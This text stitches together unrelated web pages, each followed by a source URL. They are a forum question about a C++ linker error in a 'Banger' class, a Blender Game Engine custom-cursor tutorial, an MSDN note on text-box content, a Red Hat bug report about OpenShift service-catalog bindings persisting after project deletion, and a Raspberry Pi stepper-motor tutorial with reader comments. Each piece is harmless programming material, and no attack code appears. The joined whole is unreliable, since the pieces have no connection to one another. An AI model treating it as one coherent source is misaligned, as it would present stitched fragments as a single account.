    void setDriver(char*);
    void setCar(char*);
    void setHits(int);
    void setMobile(bool);
    char *getDriver();
    char *getCar();
    int getHits();
    bool getMobile();
    static int getObjectCount();
};

int Banger::objectCount = 0;

#endif

these are my .cpp files:

#include "Banger.h"
#include <iostream>
#include <cstring>
using namespace std;

Banger::Banger()
{
    objectCount++;
}

Banger::Banger(char *name, char *body)
{
    this->driver = new char[strlen(name) + 1];
    strcpy(driver, name);
    this->car = new char[strlen(body) + 1];
    strcpy(car, body);
    objectCount++;
}

Banger::Banger(const Banger &obj)
{
    driver = new char[strlen(obj.driver) + 1];
    strcpy(driver, obj.driver);
    this->car = new char[strlen(obj.car) + 1];
    strcpy(car, obj.car);
}

void Banger::setDriver(char *name)
{
    delete [] driver;
    driver = new char[strlen(name) + 1];
    strcpy(driver, name);
}

void Banger::setCar(char *body)
{
    delete [] car;
    car = new char[strlen(body) + 1];
    strcpy(car, body);
}

void Banger::setHits(int num)
{
    hits = num;
}

void Banger::setMobile(bool b)
{
    if (b == true)
    {
        mobile = true;
    }
    else
        mobile = false;
}

char* Banger::getDriver()
{
    return driver;
}

char* Banger::getCar()
{
    return car;
}

int Banger::getHits()
{
    return hits;
}

bool Banger::getMobile()
{
    return mobile;
}

int Banger::getObjectCount()
{
    return objectCount;
}

#include <iostream>
#include <cstring>
#include <fstream>
#include <cstdlib>
#include <ctime>
#include "Banger.h"
using namespace std;

const int MAX_CARS = 5;
const int MAX_LENGTH = 30;
const int STOP = 6;

int main()
{
    Banger* car[MAX_CARS];
    ifstream inFile("competitors.txt");

    // Making sure the file is open
    if (!inFile)
    {
        cout << "Error opening file" << endl;
        return EXIT_FAILURE;
    }

    cout << "The CSE 1384 Demolition Derby is now open for registration.\nAre there any takers?" << endl;

    // Testing default constructor and setters, creating first car (index = 0)
    car[0] = new Banger;
    car[0]->setDriver("Max Champ");
    car[0]->setCar("truck");
    car[0]->setHits(0);
    car[0]->setMobile(true);
    cout << "There is now " << Banger::getObjectCount() << " car in the derby." << endl;

    // Testing the parameter constructor, creating the rest of the cars
    for (int i = 1; i < MAX_CARS; i++)
    {
        char name[MAX_LENGTH], body[MAX_LENGTH];
        inFile.getline(name, MAX_LENGTH);
        inFile.getline(body, MAX_LENGTH);
        car[i] = new Banger(name, body);

        // Testing the static object count
        cout << "There are now " << Banger::getObjectCount() << " cars in the derby." << endl;
    }

    // Testing getDriver() and getCar()
    cout << "Registation is now closed. Here's who we have in our race:" << endl << endl;
    for (int i = 0; i < MAX_CARS; i++)
        cout << car[i]->getDriver() << "\t" << car[i]->getCar() << endl;

    // Testing Object Count
    cout << "And now it's time for the race!" << endl << endl;
    cout << endl << "Welcome ladies and gentlemen to the first ever CSE 1384 Demolition Derby.\nWe have ";
    cout << Banger::getObjectCount() << " cars in the arena to rock your world with all of the" << endl;
    cout << "smashing and crashing that you could ever hope for. It promises to be an \nexciting night." << endl << endl;

    // Testing getters
    cout << "Our returning champion, " << car[0]->getDriver() << ", has come tonight with his newest ";
    cout << car[0]->getCar() << ".\nThe race hasn't started yet so he has " << car[0]->getHits() << " hits ";
    cout << "so far,";
    if (car[0]->getMobile())
        cout << " but is he ever mobile.\nYee-haa! Look at him move. Yessiree, it should be a fine show." << endl;

    /* Start of commented out section
    cout << endl << "Let's start this game." << endl << endl << "BANG!" << endl << endl;
    srand(time(0));

    // The derby -- smashing and crashing.
    // Continues as long as there are more than one banger
    while (Banger::getObjectCount() > 1)
    {
        if (Banger::getObjectCount() < 5)
            cout << "We're down to ";
        else
            cout << "We still have ";
        cout << Banger::getObjectCount() << " cars in the race." << endl;

        int basher = rand() % MAX_CARS;

        // Make sure that the attacking car is still in the game
        while (car[basher] == 0)
            basher = rand() % MAX_CARS;

        int bashed = rand() % MAX_CARS;

        // Make sure that the car being attacked is a different one from the attacker
        // and that the car is still in the game
        while (basher == bashed || car[bashed] == 0)
        {
            bashed = rand() % MAX_CARS;
        }

        cout << car[basher]->getDriver() << " just hit " << car[bashed]->getDriver() << " and...." << endl;

        int hitHard = rand() % 10;

        // if hit hard enough to immobilize the car
        if (hitHard > STOP)
        {
            (*car[basher])++; // Testing overloaded postfix increment operator
            cout << "Yes! It looks like he can't get his ol' " << car[bashed]->getCar() << " movin'." << endl
                 << "He's out of the game!" << endl;
            delete car[bashed]; // Testing destructor
            car[bashed] = 0;
        }
        else
        {
            ++(*car[basher]); // Testing overloaded prefix increment operator
            cout << "But he's still moving -- so he's still in the game." << endl;
        }
        cout << endl << endl;
    }

    cout << "The crowd is going WILD! There's only one car left now. " << endl;

    // Testing Copy Constructor
    int i;
    for (i = 0; i < MAX_CARS; i++)
        if (car[i] != 0)
            break;
    Banger champion = *(car[i]);
    cout << "So with " << champion.getHits() << " hits in this game, our new champion is...."
         << "drum-roll please...." << endl << champion.getDriver() << "!!!" << endl << endl
         << "Everybody be sure to say a big CONGRATULATIONS to ";

    // Testing overloaded assignment
    Banger nextReturningChamp;
    nextReturningChamp = champion;
    cout << nextReturningChamp.getDriver() << " -- our champion" << endl;
    cout << "for the next year when we get together and do the whole thing over again." << endl;
    cout << "Until then, keep on crashin' and a-smashin'!" << endl << endl;
    */

    return EXIT_SUCCESS;
}

this is the error I got, I don't have a clue what it means:

1>Linking...
1>LINK : C:\Users\Ankit Arya\Documents\Visual Studio 2008\Projects\lab3\Debug\lab3.exe not found or not built by the last incremental link; performing full link
1>lab3.obj : error LNK2005: "private: static int Banger::objectCount" (?objectCount@Banger@@0HA) already defined in Banger.obj
1>C:\Users\Ankit Arya\Documents\Visual Studio 2008\Projects\lab3\Debug\lab3.exe : fatal error LNK1169: one or more multiply defined symbols found

and ya, here is the txt file:

Rarin Togo
sedan
Slugger Hard
station wagon
Rolin Over
volkswagon
Mini Van
station wagon
Max Military
jeep
https://www.daniweb.com/programming/software-development/threads/257294/copy-constructors
BGE: Custom Cursor

Blendenzo’s custom cursor tutorial does a great job at providing us with a simple way to add custom cursors to our games. But what if we want it to do more? What if we want to control the sensitivity, or the area that the cursor is in? Well, read on as we return to our Duck Duck Moose game to improve the cursor control with a custom cursor class. We’ll start a bit backwards, by looking through cursor.py and what it does before moving on to how to use it. I placed everything in its own class that extends the KX_GameObject so that it can easily be applied to a number of games and the class can be extended to suit needs. It’s designed to be passed the KX_GameObject that is functioning as a cursor.

cursor.py:

##################################################################
#                                                                #
# BGE Custom Cursor v1                                           #
#                                                                #
# By Jay (Battery)                                               #
#                                                                #
# Feel free to use this as you wish, but please keep this header #
#                                                                #
##################################################################

from bge import render, logic, types, events

class Cursor(types.KX_GameObject):

    def __init__(self, own):
        self._searchScene = logic.getCurrentScene()
        self.camera = logic.getCurrentScene().active_camera
        self.sens = 0.005
        self.screenX = render.getWindowWidth()
        self.screenY = render.getWindowHeight()
        self.centreX = int(self.screenX / 2)
        self.centreY = int(self.screenY / 2)
        self.searchScene = logic.getCurrentScene().name
        render.setMousePosition(self.centreX, self.centreY)
        self.cursorPos = [0.5, 0.5]
        self._limits = [0, 0, 1, 1]
        return

    @property
    def searchScene(self):
        return self._searchScene

    @searchScene.setter
    def searchScene(self, scene):
        for s in logic.getSceneList():
            if s.name == scene:
                self._searchScene = s

    @property
    def limits(self):
        return self._limits

    @limits.setter
    def limits(self, limitList):
        assert isinstance(limitList, (list, tuple)), "Limits must be a list"
        assert len(limitList) == 4, "limits takes a list of 4 integers [x1,y1,x2,y2]"
        self._limits = [limitList[0] * 0.01,
                        limitList[1] * 0.01,
                        1 - (limitList[2] * 0.01),
                        1 - (limitList[3] * 0.01)]

    def centreRealCursor(self):
        render.setMousePosition(self.centreX, self.centreY)
        return

    def getMovement(self):
        mPos = logic.mouse.position
        x = self.centreX - (mPos[0] * self.screenX)
        y = self.centreY - (mPos[1] * self.screenY)
        self.centreRealCursor()
        return [x, y]

    def moveCursor(self):
        movement = self.getMovement()
        movement[0] *= self.sens
        movement[1] *= self.sens
        self.position.x -= movement[0]
        self.position.y += movement[1]
        self.cursorPos = self.camera.getScreenPosition(self)
        if self.cursorPos[0] > self.limits[2] or self.cursorPos[0] < self.limits[0]:
            self.position.x += movement[0]
        if self.cursorPos[1] > self.limits[3] or self.cursorPos[1] < self.limits[1]:
            self.position.y -= movement[1]
        return

    def getCursorOver(self, prop=""):
        cam = self.searchScene.active_camera
        obj = cam.getScreenRay(self.cursorPos[0], self.cursorPos[1], 1000, prop)
        return obj

    def mouseEvents(self):
        if logic.mouse.events[events.MOUSEX] == logic.KX_INPUT_ACTIVE:
            self.onCursorMovement()
        if logic.mouse.events[events.MOUSEY] == logic.KX_INPUT_ACTIVE:
            self.onCursorMovement()
        if logic.mouse.events[events.LEFTMOUSE] == logic.KX_INPUT_JUST_ACTIVATED:
            self.onLeftClick()
        if logic.mouse.events[events.RIGHTMOUSE] == logic.KX_INPUT_JUST_ACTIVATED:
            self.onRightClick()
        if logic.mouse.events[events.MIDDLEMOUSE] == logic.KX_INPUT_JUST_ACTIVATED:
            self.onMiddleClick()
        if logic.mouse.events[events.WHEELUPMOUSE] == logic.KX_INPUT_JUST_ACTIVATED:
            self.onWheelUp()
        if logic.mouse.events[events.WHEELDOWNMOUSE] == logic.KX_INPUT_JUST_ACTIVATED:
            self.onWheelDown()
        return

    def onCursorMovement(self):
        self.moveCursor()

    def onLeftClick(self):
        pass

    def onRightClick(self):
        pass

    def onMiddleClick(self):
        pass

    def onWheelUp(self):
        pass

    def onWheelDown(self):
        pass

We treat the cursor exactly like we would if it was a first-person camera: keep the mouse cursor centred and measure movement from the centre position.
We can then multiply the distance moved by a sensitivity value (self.sens) and add the result to the pseudo-cursor's position. This task is handled by the methods .centreRealCursor(), .getMovement() and .moveCursor().

For the pseudo-cursor to function as a real cursor we need to keep track of its position in screen space. This is done using the KX_Camera method .getScreenPosition() and is saved in the class variable self.cursorPos as [x, y].

The main work is done in .mouseEvents(). This method looks for active events and calls the appropriate handler. The handler methods for events are deliberately left blank so that you can define the action that occurs (we'll see how later), as each game will handle events differently. The only exception is .onCursorMovement(), which is bound to .moveCursor() unless otherwise specified by the user.

For the cursor to interact with the scene, the .getCursorOver(prop="") method returns the object that the cursor is over, or None if there isn't one. You can pass a property name so it only picks up objects with that property.

Now, here's where things get a little tricky. If the script is running in an overlay scene then, by default, the .getCursorOver() method will look in that scene. To specify which scene we want to search for mouse-over objects, we need to set the variable self.searchScene to the scene we're after. This just takes the scene's name as a string; the class will do the rest of the work. Finally, this only works with a scene that has a camera, and the camera must be perspective. Orthographic cameras will not return the correct object the mouse is over (this is down to a bug in Blender). By being able to set the search scene, we can keep our overlay camera in perspective mode while making sure we're looking in the right scene.

The Cursor() class allows you to set limits on the cursor's area of operation. By default, this is the whole game screen.
We can set them by assigning a list of 4 integers to the property .limits (i.e. myCursor.limits = [x1,y1,x2,y2]). These values are percentages of screen space, so .limits = [10,10,10,10] would create a border 10% of the screen size that the cursor cannot enter. Using percentages means that the cursor's area of operation remains the same regardless of the screen size.

Setting it up

Create a new scene; we'll call it 'HUD'. In this scene add your cursor object. Make sure that the front of the cursor (what the player sees) is facing up along the world's Z axis. Now add a camera. Position your camera above the cursor object so it's looking down the Z axis. All going well, when you look down the camera the Y axis should be up/down for the cursor and the X axis should be left/right.

Using the cursor.py module

Create a new script. Let's call this runCursor.py:

import bge
import cursor

cont = bge.logic.getCurrentController()
own = cont.owner
own = cursor.Cursor(own)
own['over'] = None

# Define event actions
def leftClick():
    obj = own.getCursorOver()
    if obj:
        obj['clicked'] = True

def hover():
    own.moveCursor()
    obj = own.getCursorOver()
    if obj and 'hover' in obj:
        obj.children[0].visible = True
        own['over'] = obj
    if own['over'] != obj:
        if own['over']:
            own['over'].children[0].visible = False
        own['over'] = obj

own.onLeftClick = leftClick

# run by cursor object
def run():
    own.mouseEvents()

# change cursor states
def changeSceneToMenu():
    own.searchScene = bge.logic.getCurrentScene().name
    own.limits = [0,0,0,0]
    own.onCursorMovement = hover
    own['over'] = None

def changeSceneToGame():
    own.onCursorMovement = own.moveCursor
    own.searchScene = 'Game'
    own.limits = [22,5,22,40]

We can now import cursor.py and create a new cursor object. In doing so we pass the KX_GameObject to the Cursor() class and assign the value back to own. We can still access all the usual game object methods through own, only now it can use the Cursor() methods too.

First, we define some event actions.
The first is a left click. Here, we use the .getCursorOver() method to grab the object that has been clicked on. There are numerous things we could do with this object. In this example, it sets a property on the game object to True so the object knows that it has been clicked on and can respond appropriately (in the Duck Duck Moose game this is done through the use of property sensors). Finally, we assign our new leftClick() function to the cursor's left click handler (line 26).

We've also got a hover action. This combines the .moveCursor() method with the .getCursorOver() method to act on the object being hovered over. We don't bind this to any event just yet.

This script is designed to be run in module mode, so we create a function called run() that just calls the cursor's mouseEvents() function.

The last two functions are designed to be called when the scene changes, by the new scene in a Python module controller. Because the script is running in module mode, own is still the cursor object. This sets up the context for the cursor's operation. So when we're on a menu screen we remove any screen limits and set the .onCursorMovement() method to the new hover function we defined earlier. When we switch to the game scene we change .onCursorMovement() back to the .moveCursor() method. Each time, we make sure to update .searchScene. Using these functions we can easily use one instance of the Cursor class to respond to a variety of situations.

Setting up logic bricks

The last step is to select the cursor object and add a Python module controller to a sensor, like this:

I used an always sensor to trigger once to initialise the module, then the run() function we defined earlier will be called each time the mouse moves. You could just use an always sensor set to true pulse mode, as the cursor.py module does not require any particular sensors/actuators.

And that's all there is to it. A completely customisable, extendible, programmable cursor for the BGE.
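Before trying it in a game, it can help to check the cursor maths on its own. The following is a small engine-free sketch of the sums inside .getMovement() and the .limits setter (the function names here are illustrative, not part of cursor.py), so the centring and border behaviour can be tested outside the BGE:

```python
# Engine-free sketch of the cursor maths. Names are illustrative only.

def get_movement(mouse_pos, screen_w, screen_h):
    """Distance of the real cursor from the screen centre, in pixels.
    mouse_pos is normalised [0..1], as logic.mouse.position reports it."""
    centre_x, centre_y = screen_w // 2, screen_h // 2
    return [centre_x - mouse_pos[0] * screen_w,
            centre_y - mouse_pos[1] * screen_h]

def to_limits(percentages):
    """Convert [x1, y1, x2, y2] percentage margins to normalised bounds."""
    x1, y1, x2, y2 = percentages
    return [x1 * 0.01, y1 * 0.01, 1 - x2 * 0.01, 1 - y2 * 0.01]

def inside_limits(cursor_pos, limits):
    """True if a normalised screen position is within the allowed area."""
    return (limits[0] <= cursor_pos[0] <= limits[2] and
            limits[1] <= cursor_pos[1] <= limits[3])

# A mouse sitting exactly at the centre produces no movement:
print(get_movement([0.5, 0.5], 800, 600))   # [0.0, 0.0]
# A 10% border on every side:
print(to_limits([10, 10, 10, 10]))
print(inside_limits([0.05, 0.5], to_limits([10, 10, 10, 10])))
```

This mirrors what the class does each frame: measure the offset from centre, then veto any move that would put .cursorPos outside the normalised bounds.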
Have a look at the Duck Duck Moose game in the resources section below to see it in action.

Other ways to use cursor.py

Because all the magic is contained within a module you can import it anywhere. This means you can control your cursor from outside the overlay scene and just pass it the cursor object on initialisation. To do this, set the cursor overlay scene up as described above, without any logic/Python. Then in your main scene your Python can look something like this:

import bge
import cursor

cont = bge.logic.getCurrentController()
own = cont.owner
scene = bge.logic.getCurrentScene()

def leftClick():
    obj = myCursor.getCursorOver()
    print(obj)
    if obj:
        # do something with the object, like:
        obj.endObject()

if 'cursor' in own:
    own['cursor'].mouseEvents()
else:
    for s in bge.logic.getSceneList():
        if s.name == "HUD":
            myCursor = s.objects['Cursor']
            myCursor = cursor.Cursor(myCursor)
            # the cursor's camera must be set to the overlay scene camera
            myCursor.camera = s.active_camera
            myCursor.onLeftClick = leftClick
            own['cursor'] = myCursor
            break

Then, providing you're regularly running myCursor.mouseEvents(), it'll all work fine. This has the advantage that the object returned by myCursor.getCursorOver() is available in the same script as other parts of the game code, so you don't need to find a way to tell the object/game that something has been clicked on. However, when using this method you need to be aware of two things. Firstly, you need to make sure that the overlay scene has been initialised before trying to pass the cursor game object to the Cursor class. Secondly, you need to update Cursor.camera to the camera in the overlay scene (line 23 in the above example), otherwise the cursor position will be wrong.
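A design note on the event binding used throughout: because the handlers are plain attributes, assigning a new function to one instance changes its behaviour without subclassing. Here is a tiny engine-free sketch of that pattern (the class and names are invented for illustration, they are not part of cursor.py):

```python
# Minimal sketch of the handler-rebinding pattern used by Cursor.

class Dispatcher:
    def on_left_click(self):
        pass  # deliberately blank, like Cursor.onLeftClick

    def fire(self, event):
        # instance attributes shadow the class method, so a rebound
        # handler takes over automatically
        if event == 'LEFT':
            self.on_left_click()

log = []
d = Dispatcher()
d.fire('LEFT')                            # default handler does nothing
d.on_left_click = lambda: log.append('clicked')
d.fire('LEFT')                            # rebound handler runs instead
print(log)                                # ['clicked']
```

This is exactly why own.onLeftClick = leftClick in runCursor.py works: the lookup finds the instance attribute before the blank class method.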
Alternatively, you could set the game up just like in the tutorial above, with all the cursor control happening in the overlay scene, and extend the KX_GameObject class to handle click events:

from bge import types, logic

class Button(types.KX_GameObject):
    # extends KX_GameObject to add on click events
    def __init__(self, own):
        return

    def onClick(self):
        pass

    def inflate(self):
        self.localScale[0] += 0.2
        self.localScale[1] += 0.2
        self.localScale[2] += 0.2
        return

    def deflate(self):
        self.localScale[0] -= 0.2
        self.localScale[1] -= 0.2
        self.localScale[2] -= 0.2
        return

def mutateInflate():
    own = logic.getCurrentController().owner
    own = Button(own)
    own.onClick = own.inflate
    own['clickable'] = True

def mutateDeflate():
    own = logic.getCurrentController().owner
    own = Button(own)
    own.onClick = own.deflate
    own['clickable'] = True

This script would be attached to a Python module controller, calling the appropriate mutate function for each object. Then runCursor.py would look something like this:

import bge
import cursor

cont = bge.logic.getCurrentController()
own = cont.owner
own = cursor.Cursor(own)

# Define event actions
def leftClick():
    obj = own.getCursorOver()
    if obj:
        if 'clickable' in obj:
            obj.onClick()

own.searchScene = 'Scene'
own.onLeftClick = leftClick

# run by cursor object
def run():
    own.mouseEvents()

See the resources section below for examples of other ways to use cursor.py.

Closing Remarks

Hopefully, this custom cursor module is useful to people. There are some bugs to fix, and I plan to expand on it and increase its functionality (switching cursors, actually implementing some error handling, more user control), so I will add a post with the latest version when I do. I have other plans for using this cursor object as a base class for a more complex cursor system in an RTS game and will put forward a tutorial on it soon. Until then, if you have any comments, feature requests or questions, or have noticed any errors, leave a note below.
And don't forget to check out the Blender page for other BGE/Python tutorials.

Resources

Using cursor.py outside of an overlay scene .blend
Extending KX_GameObject to handle on click events .blend
Blendenzo's original custom cursor tutorial
https://whatjaysaid.wordpress.com/2014/05/05/bge-custom-cursor/
2.1.1770 Part 4 Section 14.8.1.1, txbxContent (Rich Text Box Content Container)

For additional notes that apply to this portion of the standard, please see the notes for oMath, §22.1.2.77(f); oMathPara, §22.1.2.78(c).

a. The standard states that text box content can be placed inside endnotes, footnotes, comments, or other textboxes. Word does not allow textbox content inside endnotes, footnotes, comments, or other textboxes.

b. The standard specifies this element as part of the WordprocessingML namespace. Word will save an mce choice for VML content. txbxContent elements written in that choice will be written with a namespace value of. This note applies to the following products: Office 2013 Client (Strict), Office 2013 Server (Strict).
https://msdn.microsoft.com/en-us/library/ff534896(v=office.12).aspx
Description of problem:
When deleting a project, the bindings and instance still exist under it. Also, if another user creates a project with the same name, they can get the instance.

Version-Release number of selected component (if applicable):
openshift v3.6.172.0.0
kubernetes v1.6.1+5115d708d7
etcd 3.2.1

How reproducible: Always

Steps to Reproduce:
1. Create a project and create bindings and an instance in it
[root@host-8-241-22 dma]# oadm new-project ups
Created project ups
[root@host-8-241-22 dma]# oc create -f bindings.yaml -n ups
binding "ups-binding" created
[root@host-8-241-22 dma]# oc create -f instance.yaml -n ups
instance "ups-instance"
2. Delete the project and check the bindings and instance
[root@host-8-241-22 dma]# oc delete project ups
project "ups" deleted
[root@host-8-241-22 dma]# oc get project ups
Error from server (NotFound): namespaces "ups" not found
3. Log in with a different user, create a project with the same name, then get the instance and bindings

Actual results:
2. The bindings and instance still exist after deleting the project
3. A different user can get the instance and bindings

Expected results:
2. Bindings and instance should be removed after deleting the project
3. A different user shouldn't get the instance and bindings

Additional info:
The env is installed by openshift-ansible

Paul - please triage further, possibly want to doc this as known issue for 3.6, definitely must fix for 3.7.

Hi guys, I experience the same issue. Is there currently a workaround to remove remaining bindings and instances?
Using oc delete does not work at all:

[root@ocp-master01 archi]# oc get bindings.servicecatalog.k8s.io
NAME                            KIND
mongodb-ephemeral-4dzlt-d5nwm   Binding.v1alpha1.servicecatalog.k8s.io
[root@ocp-master01 archi]# oc delete bindings.servicecatalog.k8s.io mongodb-ephemeral-4dzlt-d5nwm
binding "mongodb-ephemeral-4dzlt-d5nwm" deleted
[root@ocp-master01 archi]# oc get bindings.servicecatalog.k8s.io
NAME                            KIND
mongodb-ephemeral-4dzlt-d5nwm   Binding.v1alpha1.servicecatalog.k8s.io

Thank you in advance

Maxime - When you delete these resources, they have to be finalized before they are fully deleted. This requires communication with the service broker that offers the service, so you will rarely see these resources be fully deleted immediately. You can check the status of the ServiceBinding to get information about what's happening to the object.

This seems to work properly with the current latest build, but I will retest after is merged.

Several notes: if there is an error with the binding, the error condition may block the deletion of the instance and binding. I've got at least 2 example error conditions:

1) Create an instance that references a serviceclass from TSB such as mysql-persistent (update service-catalog/go/src/github.com/kubernetes-incubator/service-catalog/contrib/examples/walkthrough/ups-instance.yaml and then oc create -f ups-instance.yaml). Then create a binding for this instance. If you look at the controller logs, you will see errors around the serviceclass, and the instance and binding are in an error condition, ready=false.

2) I installed the Ansible Service Broker and then created a hastebin application. Once this was deployed I created a binding for it.
In the controller logs, there are errors/warnings like this:

type: 'Warning' reason: 'ErrorNonbindableServiceClass' References a non-bindable ClusterServiceClass (K8S: "ab24ffd54da0aefdea5277e0edce8425" ExternalName: "dh-hastebin-apb") and Plan ("default") combination

In both cases, because the binding is in an error state, you can't delete it and it blocks cleaning up the associated instance. I'll create an upstream service catalog bug for this and come back with a link.

Upstream issue for items in comment 5

This all looks to work properly. If using an Ansible-installed OpenShift, please ensure it has which was merged today.

I'm not sure I understand this comment:
> I found there will always leave a new namespace after delete a target namespace.
Can you clarify what you meant here?

The pod in question appears to be a pod that the Ansible broker left running. The Ansible broker runs pods in transient namespaces, and these are unrelated to the namespace that the service catalog resources (ServiceInstances, ServiceBindings) were created in.

Yeah... but the transient namespaces exist the whole time. As shown above, the transient namespace "a5fc66c0-e4da-4b9b-a23c-ff7609068e7e" has been alive for 17 hours; is that normal?

[root@preserve-jiazha-1024master-etcd-1 ~]# oc get ns | grep a5fc66c0-e4da-4b9b-a23c-ff7609068e7e
a5fc66c0-e4da-4b9b-a23c-ff7609068e7e Active 17h

In my opinion, the transient namespace should be deleted immediately after deleting the namespace that the user created, right?

Shawn, please see if you can reproduce and gain insight into what might be wrong.

1. User deletes the project/namespace.
2. Svc catalog sends us a deprovision.
3. We attempt to create a svc-acct that has access to the deleted namespace.
4. We create the transient namespace and run the pod, which cannot access the target namespace because it does not exist.
5. The pod fails and we keep the transient namespace around due to configuration.
On a deprovision request we can check whether the target namespace is already gone and, if so, simply complete the deprovision.
https://bugzilla.redhat.com/show_bug.cgi?id=1476173
Having played with LEDs, switches and buzzers, I felt the natural next step was playing with a stepper motor or two. Unlike conventional electric motors, stepper motors allow you to rotate the axis in precise increments. This makes them useful in all sorts of Raspberry Pi projects.

Basic Stepper Motor

There is a huge selection of stepper motors to buy, but I decided to experiment with a 28BJY-48 with a ULN2003 control board. The reasons I chose this device were:

- It is cheap
- Runs on 5V
- Easy to interface to the Pi's GPIO header
- Small but relatively powerful
- Widely available from both overseas and UK sellers
- Easy to obtain with a controller board

There are additional details in the Stepper Motor 28BJY-48 Datasheet.

Buy Stepper Motors for the Pi

The 28BJY-48 stepper motors can be obtained from:

Interfacing With The Pi

The stepper motor connects to the controller board with a pre-supplied connector. The controller board has six pins which need to be connected to the Pi's GPIO header:

- 5V (P1-02)
- GND (P1-06)
- Inp1 (P1-11)
- Inp2 (P1-15)
- Inp3 (P1-16)
- Inp4 (P1-18)

Reversing the sequence results in the direction being reversed.

Example Stepper Motor Python Script

Here is a copy of the stepper motor script I used to rotate the stepper motor. It uses the RPi.GPIO library and defines a 4-step and 8-step sequence.
#!/usr/bin/python
# Import required libraries
import sys
import time
import RPi.GPIO as GPIO

# Use BCM GPIO references
# instead of physical pin numbers
GPIO.setmode(GPIO.BCM)

# Define GPIO signals to use
# Physical pins 11,15,16,18
# GPIO17,GPIO22,GPIO23,GPIO24
StepPins = [17,22,23,24]

# Set all pins as output
for pin in StepPins:
  print "Setup pins"
  GPIO.setup(pin,GPIO.OUT)
  GPIO.output(pin, False)

# Define advanced sequence
# as shown in manufacturers datasheet
Seq = [[1,0,0,1],
       [1,0,0,0],
       [1,1,0,0],
       [0,1,0,0],
       [0,1,1,0],
       [0,0,1,0],
       [0,0,1,1],
       [0,0,0,1]]

StepCount = len(Seq)
StepDir = 1 # Set to 1 or 2 for clockwise
            # Set to -1 or -2 for anti-clockwise

# Read wait time from command line
if len(sys.argv)>1:
  WaitTime = int(sys.argv[1])/float(1000)
else:
  WaitTime = 10/float(1000)

# Initialise variables
StepCounter = 0

# Start main loop
while True:
  print StepCounter,
  print Seq[StepCounter]

  for pin in range(0, 4):
    xpin = StepPins[pin]
    if Seq[StepCounter][pin]!=0:
      print " Enable GPIO %i" %(xpin)
      GPIO.output(xpin, True)
    else:
      GPIO.output(xpin, False)

  StepCounter += StepDir

  # If we reach the end of the sequence
  # start again
  if (StepCounter>=StepCount):
    StepCounter = 0
  if (StepCounter<0):
    StepCounter = StepCount+StepDir

  # Wait before moving on
  time.sleep(WaitTime)

You can download it directly to your Pi using:

wget

The script needs to be run using "sudo":

sudo python stepper.py

Press Ctrl-C to quit.

Step Wait Time

The script adds a small delay between each step to give the motor time to catch up. In this example the default wait time is set to 0.01 seconds (10 milliseconds). To change the speed of rotation you can change this value. I found I could reduce it to 4ms before the motor stopped working. If the script runs too fast the motor controller can't keep up. This performance may vary depending on your motor and its controller.
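If you want to sanity-check the sequencing logic without a Pi attached, the stepping and wraparound can be simulated in plain Python. This sketch uses the same Seq table but a modulo wrap (a tidier equivalent of the two if statements) and simply collects the coil patterns that would be written to the GPIO pins:

```python
# GPIO-free simulation of the stepping logic. The Seq table is the same
# 8 half-steps as the script above; simulate() returns the coil patterns
# that would be driven, so wraparound can be checked on any machine.

Seq = [[1,0,0,1],
       [1,0,0,0],
       [1,1,0,0],
       [0,1,0,0],
       [0,1,1,0],
       [0,0,1,0],
       [0,0,1,1],
       [0,0,0,1]]

def simulate(step_dir, count, start=0):
    """Return the coil patterns for `count` steps in direction step_dir."""
    patterns, counter = [], start
    for _ in range(count):
        patterns.append(Seq[counter])
        counter = (counter + step_dir) % len(Seq)  # wraps cleanly both ways
    return patterns

print(simulate(2, 4))   # StepDir=2: the four two-coil "full" steps
print(simulate(-1, 2))  # anti-clockwise: walks the table backwards
```

With StepDir set to 2 only the even slots are visited, which is why the full-step mode uses 4 of the 8 entries.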
To specify a different wait time you can pass a number of milliseconds as an argument on the command line using:

sudo python stepper.py 20

where 20 is the number of milliseconds.

Step Sequences

The complete step sequence consists of 8 steps. If StepDir is set to -2 or 2, the number of steps is reduced to 4.

Final Thoughts

You can now control a stepper motor using a Raspberry Pi and a Python script. If you add another motor 😉 🙂

Thanks anyway, this page is a good start with stepper motors.

I noticed the opposite! My motor's common is hooked up to +12V and when GPIOs are off, the coils are presumably hooked up to 0V. It was very unintuitive that when my motor was not doing anything, it got super hot!

All stepper motors draw current even when they are not being used. And since you're giving it an extra 7V, it's getting hot. The 24byj48 only uses 5V.

I have it wired properly. The lights flash in sync but the motor does not turn. And the motor is getting warm. Using the 5 volts off of the board as shown. What do I need to change?

Try increasing the time delay. Also try physically twisting the motor axle at the same time. One of my cheap stepper motors was stuck but started turning with a quick twist.
How can i connect 2 stepper motors on a single raspberrypi? Will I need two control boards? If so then 2 control boards can be connected to a single raspberry pi? Please repl asap. I’ve got my project to be done in 2 weeks. I’m new to raspberry pi. You can connect two stepper motors and you would need two control boards. The second board would be connected to another 4 available GPIO pins. The Python code would need to be modified to use those 4 pins. Thanks so much for the info and the code, got my motor going with only some minor troubles. Some things that would have helped me: Maybe make a note that raspberry pi 2 (and model b) have different GPIO pinouts. Please for future people change the code so on line 37 it casts to a float rather than int. I was trying to get my motor to run quite slow so I did $sudo python stepper.pi 500. Unfortunately as an int this evaluates to 0 and waits for 0 seconds. Hi William, I’ve changed the GPIO pins I use in the example to avoid GPIO27 as that changes between the B and B+ configurations. I’d updated the BitBucket version of the code to fix the wait time issue but hadn’t updates the version on the page. So work ok now. Hello Sir please help me its showing error as below what to do [Traceback (most recent call last): File “/home/pi/stepper1.py”, line 20, in GPIO.setup(pin,GPIO.OUT) RuntimeError: No access to /dev/mem. Try running as root!] Are you using “sudo” to run the Python script? Hi, thanks for the info. This works great for me clockwise but I can’t get it to go anti-clockwise, could I have a faulty motor or am I doing something wrong? I have a Model B version 1.0 and am using physical pins 11, 15, 16 and 18 with step pins [17,22,23,24] in my code. I’d be grateful of any help. Thanks. this works perfect for my setup, all i had to do was change the pin numbers. im trying to put the actual moving of the motor section into a function, wondering how easy that would be? 
I've been trying:

def mover():
  for pin in range(0, 4):
    xpin = StepPins[pin]
    print StepCounter
    print pin
    if Seq[StepCounter][pin]!=0:
      print " Step %i Enable %i" %(StepCounter,xpin)
      GPIO.output(xpin, True)
    else:
      GPIO.output(xpin, False)
  StepCounter += StepDir
  # If we reach the end of the sequence
  # start again
  if (StepCounter>=StepCount):
    StepCounter = 0
  if (StepCounter<0):
    StepCounter = StepCount
  # Wait before moving on
  time.sleep(WaitTime)

while True:
  mover()

However this doesn't work? What needs to be passed into this function?

There's a bug in the code where StepDir = -2. It wraps from 0 to 7 (should be 0 to 6). Replace

if (StepCounter>=StepCount):
  StepCounter = 0
if (StepCounter<0):
  StepCounter = StepCount

with

StepCounter %= len(Seq)

